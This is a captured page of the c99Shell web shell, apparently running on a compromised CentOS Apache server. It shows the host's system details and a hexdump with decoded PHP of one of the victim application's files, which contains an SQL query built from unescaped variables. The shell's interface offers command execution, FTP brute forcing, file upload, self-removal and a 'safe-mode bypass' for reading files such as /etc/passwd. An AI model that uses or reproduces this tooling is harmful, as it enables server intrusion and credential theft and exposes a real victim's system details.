110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/info/ drwxr-xr-x Free 52.33 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/info/ drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: infoaddin_hdr.php (1.29 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/mis2222/info/infoaddin_hdr.php
Size	1.29 KB
MD5	1c285c2246ad842e6a00573abf7d81bb
Owner/Group	apache/apache
Perms	-rwxr-xr-x
Create time	20/02/2020 14:54:08
Access time	31/07/2024 04:02:14
MODIFY time	13/06/2011 13:54:48

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528

3C 3F 70 68 70 0A 72 65 71 75 69 72 65 5F 6F 6E 63 65 20 22 69 6E 66 6F
73 79 73 5F 67 6C 6F 62 61 6C 2E 70 68 70 22 3B 0A 72 65 71 75 69 72 65
5F 6F 6E 63 65 20 22 24 7B 5F 4D 4F 44 5F 50 41 54 48 7D 6D 6F 64 5F 74
70 6C 75 74 69 6C 73 2E 70 68 70 22 3B 0A 0A 72 65 71 75 69 72 65 5F 6F
6E 63 65 20 22 24 7B 5F 43 4C 41 53 53 5F 50 41 54 48 7D 63 6C 73 43 6F
6E 6E 65 63 74 69 6F 6E 2E 70 68 70 22 3B 0A 72 65 71 75 69 72 65 5F 6F
6E 63 65 20 22 24 7B 5F 43 4C 41 53 53 5F 50 41 54 48 7D 63 6C 73 44 42
2E 70 68 70 22 3B 0A 72 65 71 75 69 72 65 5F 6F 6E 63 65 20 22 24 7B 5F
55 4D 53 5F 50 41 54 48 7D 63 6C 73 55 73 65 72 2E 70 68 70 22 3B 0A 0A
73 65 74 6E 6F 63 61 63 68 65 28 29 3B 0A 0A 73 65 73 73 69 6F 6E 5F 73
74 61 72 74 28 29 3B 0A 69 66 20 28 6C 6F 67 67 65 64 5F 69 6E 28 29 29
20 7B 0A 20 20 20 20 24 6F 55 20 3D 20 26 24 5F 53 45 53 53 49 4F 4E 5B
22 6F 55 22 5D 3B 0A 20 20 20 20 24 55 73 49 44 20 3D 20 24 6F 55 2D 3E
75 73 65 72 49 44 3B 0A 20 20 20 20 69 66 20 28 21 69 73 73 65 74 28 24
5F 53 45 53 53 49 4F 4E 5B 22 41 44 44 49 4E 5F 4F 57 4E 45 52 22 5D 29
29 20 7B 0A 20 20 20 20 20 20 20 20 24 6F 43 20 3D 20 6E 65 77 20 63 6C
73 43 6F 6E 6E 65 63 74 69 6F 6E 28 24 47 4C 4F 42 41 4C 53 5B 22 44 42
48 4F 53 54 22 5D 2C 20 24 47 4C 4F 42 41 4C 53 5B 22 44 42 4E 41 4D 45
5F 55 4D 53 22 5D 2C 20 24 47 4C 4F 42 41 4C 53 5B 22 44 42 55 53 45 52
5F 55 4D 53 22 5D 2C 20 24 47 4C 4F 42 41 4C 53 5B 22 44 42 50 41 53 53
5F 55 4D 53 22 5D 29 3B 0A 20 20 20 20 20 20 20 20 69 66 20 28 24 6F 43
2D 3E 63 20 26 26 20 24 6F 43 2D 3E 65 72 72 6D 73 67 20 3D 3D 20 22 22
29 20 7B 0A 20 20 20 20 20 20 20 20 20 20 20 20 24 5F 53 45 53 53 49 4F
4E 5B 22 41 44 44 49 4E 5F 4F 57 4E 45 52 22 5D 20 3D 20 61 72 72 61 79
28 29 3B 0A 20 20 20 20 20 20 20 20 20 20 20 20 24 64 62 20 3D 20 24 47
4C 4F 42 41 4C 53 5B 22 44 42 4E 41 4D 45 5F 55 4D 53 22 5D 3B 0A 20 20
20 20 20 20 20 20 20 20 20 20 66 6F 72 65 61 63 68 20 28 24 47 4C 4F 42
41 4C 53 5B 22 5F 41 44 44 49 4E 5F 57 47 4F 57 4E 45 52 22 5D 20 61 73
20 24 6B 65 79 20 3D 3E 20 24 76 61 6C 75 65 29 20 7B 0A 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 24 6F 77 6E 65 72 71 72 79 20 3D 20 22
73 65 6C 65 63 74 20 75 6D 75 73 65 72 67 72 6F 75 70 2E 2A 20 66 72 6F
6D 20 24 64 62 2E 75 6D 75 73 65 72 67 72 6F 75 70 20 77 68 65 72 65 20
75 6D 75 73 65 72 67 72 6F 75 70 2E 55 67 55 73 49 44 20 3D 20 24 55 73
49 44 20 61 6E 64 20 75 6D 75 73 65 72 67 72 6F 75 70 2E 55 67 47 70 49
44 20 3D 20 24 76 61 6C 75 65 22 3B 0A 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 24 6F 77 6E 72 65 73 20 3D 20 6D 79 73 71 6C 5F 71 75 65
72 79 28 24 6F 77 6E 65 72 71 72 79 2C 20 24 6F 43 2D 3E 63 29 3B 0A 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6D 79 73 71 6C
5F 6E 75 6D 5F 72 6F 77 73 28 24 6F 77 6E 72 65 73 29 20 3E 20 30 29 0A
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 5F 53 45
53 53 49 4F 4E 5B 22 41 44 44 49 4E 5F 4F 57 4E 45 52 22 5D 5B 24 6B 65
79 5D 20 3D 20 74 72 75 65 3B 0A 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 65 6C 73 65 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 24 5F 53 45 53 53 49 4F 4E 5B 22 41 44 44 49 4E 5F 4F 57 4E
45 52 22 5D 5B 24 6B 65 79 5D 20 3D 20 66 61 6C 73 65 3B 0A 20 20 20 20
20 20 20 20 20 20 20 20 7D 0A 20 20 20 20 20 20 20 20 7D 0A 20 20 20 20
7D 0A 20 20 20 20 6F 62 5F 73 74 61 72 74 28 22 61 64 64 69 6E 55 52 4C
4C 69 6E 6B 22 29 3B 0A 7D 20 65 6C 73 65 20 7B 0A 20 20 20 20 24 66 75
6C 6C 5F 75 72 6C 20 3D 20 24 47 4C 4F 42 41 4C 53 5B 22 5F 50 52 4F 54
4F 43 4F 4C 22 5D 20 2E 20 24 47 4C 4F 42 41 4C 53 5B 22 5F 49 4E 46 4F
5F 49 4E 44 45 58 22 5D 3B 0A 20 20 20 20 23 68 65 61 64 65 72 28 22 4C
6F 63 61 74 69 6F 6E 3A 20 24 66 75 6C 6C 5F 75 72 6C 22 29 3B 0A 20 20
09 3F 3E 0A 09 3C 73 63 72 69 70 74 3E 77 69 6E 64 6F 77 2E 6C 6F 63 61
74 69 6F 6E 2E 68 72 65 66 3D 27 3C 3F 20 65 63 68 6F 20 24 66 75 6C 6C
5F 75 72 6C 3B 20 3F 3E 27 3B 3C 2F 73 63 72 69 70 74 3E 0A 09 3C 3F 0A
7D 0A 3F 3E 0A

<?php require_once "info
sys_global.php"; require
_once "${_MOD_PATH}mod_t
plutils.php";  require_o
nce "${_CLASS_PATH}clsCo
nnection.php"; require_o
nce "${_CLASS_PATH}clsDB
.php"; require_once "${_
UMS_PATH}clsUser.php";
setnocache();  session_s
tart(); if (logged_in())
{     $oU = &$_SESSION[
"oU"];     $UsID = $oU->
userID;     if (!isset($
_SESSION["ADDIN_OWNER"])
) {         $oC = new cl
sConnection($GLOBALS["DB
HOST"], $GLOBALS["DBNAME
_UMS"], $GLOBALS["DBUSER
_UMS"], $GLOBALS["DBPASS
_UMS"]);         if ($oC
->c && $oC->errmsg == ""
) {             $_SESSIO
N["ADDIN_OWNER"] = array
();             $db = $G
LOBALS["DBNAME_UMS"];
          foreach ($GLOB
ALS["_ADDIN_WGOWNER"] as
$key => $value) {
           $ownerqry = "
select umusergroup.* fro
m $db.umusergroup where
umusergroup.UgUsID = $Us
ID and umusergroup.UgGpI
D = $value";
     $ownres = mysql_que
ry($ownerqry, $oC->c);
               if (mysql
_num_rows($ownres) > 0)
                    $_SE
SSION["ADDIN_OWNER"][$ke
y] = true;
   else
    $_SESSION["ADDIN_OWN
ER"][$key] = false;
        }         }
}     ob_start("addinURL
Link"); } else {     $fu
ll_url = $GLOBALS["_PROT
OCOL"] . $GLOBALS["_INFO
_INDEX"];     #header("L
ocation: $full_url");
?> <script>window.loca
tion.href='<? echo $full
_url; ?>';</script> <?
} ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]--